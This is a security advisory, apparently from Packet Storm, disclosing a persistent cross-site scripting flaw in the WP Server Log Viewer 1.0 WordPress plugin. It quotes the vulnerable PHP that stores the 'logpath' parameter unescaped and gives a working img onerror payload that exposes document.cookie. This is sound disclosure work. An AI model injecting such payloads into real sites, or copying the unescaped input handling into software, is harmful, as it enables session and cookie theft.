WP Server Log Viewer version 1.0 suffers from a persistent cross site scripting vulnerability.
4e2de8e4421dd3eced4916c7fbc26d44b30be39bdd809b487cc4ad3aca0f798a# Exploit Title: WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting
# Date: 2019-09-10
# Exploit Author: strider
# Software Link: https://github.com/anttiviljami/wp-server-log-viewer
# Version: 1.0
# Tested on: Debian 10 Buster x64 / Kali Linux
# CVE : None
====================================[Description]====================================
This plugin allows you to add logfiles via wp-admin. The problem here is that the file paths are stored unfiltered/unescaped. This gives the possibility of a persistent XSS attack.
====================================[Codepart]====================================
if( isset( $_GET['action'] ) && 'new' === $_GET['action'] && isset( $_GET['logpath'] ) ) {
// new log was added
$logs = get_option( 'server_logs' );
if( is_null( $logs ) ) {
$logs = [];
}
$log = trim( $_GET['logpath'] ); //only trimmed string no escaping
$logs[] = $log; //here the log will be added without security checks
$logs = array_values( $logs );
$index = array_search( $log, $logs );
update_option( 'server_logs', $logs );
wp_safe_redirect( admin_url('tools.php?page=wp-server-log-viewer&log=' . $index) );
}
====================================[Proof of Concept]====================================
Add new log file to the plugin.
paste this exploit into the form and submit it.
<img src=# onerror=alert(document.cookie);>log.txt
It tries to render an image and triggers the onerror event and prints the cookie. in the tab you see the log.txt
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed